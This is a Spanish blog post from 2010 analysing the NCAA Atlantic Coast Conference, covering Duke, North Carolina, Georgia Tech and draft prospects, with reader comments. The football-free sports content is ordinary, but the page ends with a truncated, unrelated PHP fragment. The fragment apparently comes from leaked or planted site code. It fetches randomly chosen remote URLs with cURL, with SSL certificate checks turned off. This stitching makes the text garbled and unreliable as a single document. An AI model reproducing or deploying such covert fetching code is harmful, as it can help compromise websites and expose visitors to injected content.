Análisis NCAA – Atlantic Coast Conference (ACC)

04 de February de 2010 por kantonyo

Antes de nada, dar las gracias al equipo de TJNBA, por ofrecerme colaborar en uno de los mejores blogs en español de baloncesto americano. A partir de ahora, y si el tiempo libre lo permite intentaré ofreceros un análisis general del desarrollo de la NCAA, la liga universitaria de baloncesto de los Estados Unidos.

A pesar del auge de la NBA en España, la NCAA sigue siendo una gran desconocida para la mayoría de los aficionados al baloncesto en este lado del charco. La importancia de esta liga, no sólo está en ser la verdadera cantera de la mejor liga de baloncesto del mundo, sino que llega mucho más lejos. Su torneo final, el March Madness (Locura de Marzo) es considerado en USA el tercer evento deportivo más importante del año, seguido por televisión con audiencias superiores incluso a los play-offs de la NBA. Por poner un ejemplo, la final del año 2009, celebrada en Detroit entre North Carolina y Michigan State consiguió reunir a más de 70.000 espectadores en el estadio de los Detroit Lions de la NFL.

En EEUU la NBA es un espectaculo de entretenimiento, donde el espectador disfruta con una bolsa de palomitas y una coca-cola. Todo lo contrario a lo que ocurre en la NCAA, donde la pasión por los colores y la rivalidad entre universidades incide en el día a día de sus aficionados, al más puro estilo europeo, provocando ambientes increibles en los pabellones universitarios.

Después de esta breve introducción, empezaremos a analizar el estado de las mejores Conferencias de la liga, iniciamos el análisis con la Atlantic Coast Conference (ACC), la gran dominadora de la última década.

Atlantic Coast Conference (ACC)

Los actuales campeones de la NCAA, los Tar Heels de North Carolina, no han tenido un buen comienzo en los enfrentamientos entre equipos de la ACC. Con un balance 2-4 y con derrotas bastante claras, como las sufridas contra Clemson o Wake Forest, parece que han notado demasiado las bajas de Ty Lawson (Denver), Hansbrough (Indiana), Ellington (Minnesota) y Danny Green (Cleveland). Con una plantilla muy joven, las esperanzas recaen sobre todo en el progreso de su ala-pívot Ed Davis, posible top 5 en el próximo draft. A pesar de un buen comienzo de temporada, Ed Davis ha defraudado en los últimos encuentros estando muy por debajo del nivel que promete. Estas derrotas han propiciado que los Tar Heels abandonen el top 25 y muy pocos confían en que pueda repetir los éxitos del pasado año.

Por el contrario sus grandes rivales, los Blue Devils de Duke, lideran la regular season de la ACC, con un balance 5-2, a pesar de su dolorosa derrota con Georgetown ante el presidente Barak Obama, fiel seguidor de la NCAA. Los de Durham, siguen confiando en su columna vertebral con la pareja de rubios John Scheyer y Kyle Singler pero con la ausencia del escolta Gerald Henderson, que dio el salto a la NBA, por el momento con poco éxito. El juego interior es su punto débil en los últimos dos años. Habrá que ver como progresa en este sentido el joven ala-pívot de 19 años, Mason Plumlee, top 10 en el mock draft de 2011. Con un balance global de 17-4, Duke se situa en el puesto 10 del AP Top.

Una de las grandes revelaciones de la temporada en esta conferencia, es la  Universidad de Georgia Tech. Los Yellows Jackets disponen posiblemente de la mejor pareja de interiores de la ACC. Gani Lawal, el potente ala-pívot de tercer año tiene este año la ayuda de uno de los mejores Freshman del año, Derrick Favors. Favors no está defraudando sus expectativas, y todas las quinielas le sitúan entre el top5 del próximo draft.

Desde el punto de vista individual, destacar la progresión de Al Farouq Aminu de Wake Forest. Alero de 2.03, verdadero especialista en el contraataque gracias a su gran zancada y cualidades físicas, pero que debe mejorar su técnica de tiro. Debido a las bajas de Jeff Teague y James Johnson ha ganado protagonismo en los Demon Deacons, convirtiéndose en su jugador referencia. Por otra parte, Greivis Vasquez, base de Maryland, ha dejado atrás su mal comienzo de la temporada y ha vuelto a sus números del año pasado. El venezolano es un base estilo europeo, conocedor del juego y experto tirador, es de los jugadores más preparados para dar el salto al profesionalismo.

Quinteto Ideal

C – Derrick Favors (Georgia Tech)
PF – Ed Davis (North Carolina)
SF – Al Farouq Aminu (Wake Forest)
SG – John Scheyer (Duke)
PG – Greivis Vasquez (Maryland)

Otros jugadores a seguir

– Centers:
Salomon Alabi (Florida State)
– Forwards:

Gani Lawal (Georgia Tech), Trevor Booker (Clemson), Tracy Smith (North Carolina State)
– Guards:
Kyle Singler (Duke), Sylven Landesberg (Virginia), Marcos Delaney (Virginia Tech)

Próximos partidos clave

4 Febrero : Georgia Tech – Duke
4 Febrero : Maryland – Florida State
6 Febrero : Virginia – Wake Forest
6 Febrero : Clemson– Virginia Tech
10 Febrero : Duke – North Carolina
10 Febrero : Virginia – Maryland
13 Febrero:  Maryland – Duke
13 Febrero : Georgia Tech – Wake Forest

Comenta

10 comentarios a esta entrada

  1. sergio dice:
    #1

    Magnífico artículo Kantonyo. Yo soy uno de esos aficionados que no conoce lo suficiente sobre la NCAA aparte de su organización, equipos e historia. Agradezco tu esfuerzo pues me van a permitir conocer mas detalles sobre el lado mas apasionado del baloncesto estadounidense y las futuras incorporaciones de las estrellas a la NBA.

      Citar

  2. Bryan García dice:
    #2

    Ya era hora que se expandiera un poquito la NCAA. 🙂

    La ACC, como la mayoría de High-Majors esta temporada ha perdido a muchos efectivos de calidad, y los chavales que han llegado de High School no son de los que aportan desde el primer año salvo muy contadas excepciones.

    Ed Davis está un poco sobrevalorado, y Derrick Favors no está aportando lo que se prometía de él. Si a esto le unimos las irregularidades de Duke y la horrorosa temporada de UNC, es lógico ver como equipos con plantillas ‘normalitas’ tengan opciones a ser campeones de la RS de la ACC. Casos de Virginia, Maryland o Wake Forest.

    Otros jugadores que se pueden destacar son el alero Chris Singleton (Florida State) o Joe Trapani (Boston College),.

      Citar

  3. Txusma dice:
    #3

    Lo de UNC es normalísimo y es que han perdido de un tacada a casi todo el equipo titular y no unos cualquieras, no.

      Citar

  4. LOVE DENISE dice:
    #4

    ya le dais a todo jejje, gracias kantonyo por publicar cosas de la NCAA, yo, por falta de tiempo, apenas conozco los jugadores de esta liga, ni que equipos son mejores, peores, etc. Seguro que gracias a ti y a los demás aprenderé a partir de ahora un huevo de cosas. Felicidades y enhorabuena en tu primer articulo. Saludos

      Citar

  5. Kantonyo dice:
    #5

    Sobre Ed Davis, me gustó bastante en los pocos minutos que disfrutó en la Final Four de Detroit, desde entonces se colocó en lo alto de los mockdraft para este año. Debido a las bajas comentadas, se ha convertido en la referencia de UNC. No empezó mal del todo la temporada, incluso tuvo una gran actuación ante Michigan St, en la repetición de la final de 2009. Pero ha sido decepcionante en las últimas semanas, totalmente desaparecido, recibiendo un correctivo de Trevor Booker, el ala-pívot sénior de Clemson. Yo sigo confiando en sus cualidades, habrá que ver si está preparado para dar el salto a la NBA, o si necesita un año más en la universidad.

    Y sobre Derrick Favors, tiene una media de 11 puntos y 8 rebotes en 26 minutos, para ser un freshman no está mal, su llegada a dado un salto de calidad a la plantilla, recordemos que Georgia Tech fue la peor universidad de la Conferencia el año pasado y este año ya la sitúan dentro del top25.

    Gracias por los ánimos, y por cierto Bryan, un placer tus comentarios, eres un crack en esto de la NCAA.

      Citar

  6. Viva_Dirk dice:
    #6

    Davis tiene clase y físico, desde luego le falta curtirse pero no parece que vaya a esperarse otro año para dar el salto, UNC no va a tener el año que viene equipo para aspirar al título y eso es de las pocas cosas que le podrian hacer quedarse.

    En esta conferencia me encanta Singler, todo elegancia y no le falta sacrificio, a este si le veo preparado. Aminu veremos como acaba el año que ya decepcionó al final de la campaña pasada, aunque es otro que casi seguro dará el salto.

      Citar

  7. TheDeerHunter dice:
    #7

    Extraordinario debut, sí señor… así da gusto. A los que te conocemos un poco no nos soprende.
    Por mi parte, ni papa de NCAA… tendré los oídos bien abiertos

      Citar

  8. portu dice:
    #8

    Gran artículo, me ha gustado mucho la estructura, sobretodo pq a mi me gusta seguir los equipos más en función de los jugadores supongo q pq conozco demasiado poco, así q te leeré atentamente.

      Citar

  9. Kantonyo dice:
    #9

    Por cierto, veo que he cometido un error, para no despistar a la gente, Kyle Singler, no es un Guard, sino todo un Forward, aunque su tipo de juego no desentonaria como escolta por su lanzamiento y visión del juego, su físico le impidiría jugar en esa posición. Ayer se marcó un partidazo contra Derrick Favors, con 30 puntos, 8 de 10 en triples, a pesar de su posición dejando a Favors en 8 puntos y dandole la victoria a Duke contra Georgia TEch.

    North CArolina volvió a perder a pesar de un decente partido de Ed Davis contra Virginia.

    Y Greivis Vasquez volvió a dar el triunfo a Maryland rozando el triple doble contra los Seminoles de Florida State.

      Citar

  10. sergio dice:
    #10

    Siempre que escucho hablar de UNC me trae muy gratos recuerdos… Independientemente de la aportacion de los Tar Heels a la NBA (Jordan, Worthy, Stackhouse, Sheed, Jamison) no podemos olvidar que Marion Jones salio de sus instalaciones. Si, una atleta que ha demostrado ser poco deportiva pero aun asi un mito para muchos. Y tambien seria logico mencionar el equipo que podrian formar con los jugadores nacidos en ese estado: Chris Paul, David Thompson, James Worthy, Bob McAdoo, Walt Bellamy, Sam Jones,…. Creo que solo estados de gran tradicion baloncestistica como NY, Ohio, Pennsylvania, MIchigan, Illinois o California puede compararseles. Y muchas de ellas tienen mucha mas poblacion. Digamos que son la Eslovenia de los estados norteamericanos

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>